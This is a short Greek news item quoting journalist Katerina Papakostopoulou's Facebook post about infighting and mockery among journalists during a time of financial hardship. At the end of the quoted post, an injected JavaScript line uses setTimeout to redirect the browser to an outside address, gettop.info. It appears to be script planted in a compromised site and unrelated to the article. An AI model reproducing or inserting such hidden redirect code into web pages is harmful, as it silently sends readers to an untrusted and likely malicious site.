Κατερίνα Παπακωστοπούλου: Φτάνει η ανθρωποφαγία μεταξύ δημοσιογράφων

0
12

Η δημοσιογράφος και παρουσιάστρια του Star Κατερίνα Παπακωστοπούλου αναφέρθηκε στον κανιβαλισμό, που καθημερινά παίρνει όλο και μεγαλύτερες διαστάσεις στο εσωτερικό του δημοσιογραφικού κόσμου, με κείμενό της στην προσωπική της ιστοσελίδα στο facebook.

Διαβάστε τι έγραψε:

«Νομίζω πως περνάμε την πιο ψυχοφθόρα περίοδο της επαγγελματικής μας πορείας. Ανεξάρτητα με το τι θα γίνει, οι δημοσιογράφοι οφείλουμε να είμαστε μονιασμένοι γιατί έχουμε και οικογένειες πίσω μας.

Στεναχωριέμαι ειλικρινά με συναδέλφους που άλλαξαν προσανατολισμό ή τακτοποίησαν σε προηγούμενα χρόνια τις ζωές τους και σήμερα έρχονται να χλευάσουν τα μηνύματα συναδέλφων τους που αγωνιούν ή αγωνίζονται. Σαφώς και όλες οι εργασιακές ομάδες έχουν θιγεί, σαφώς και εκατοντάδες συνάνθρωποί μας έχουν υποστεί δραματική αλλαγή στη ζωή τους, αλλά η λογική επειδή «το έπαθα εγώ πρέπει να το πάθει και ο δίπλα» πρέπει να εκλείψει! Αντί να σκεφτούμε ότι η μεσαία τάξη οδηγείται στην απόλυτη φτωχοποίηση, τρωγόμαστε μεταξύ μας για το τι είπε ο ένας και τι έγραψε ο άλλος στο facebook». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here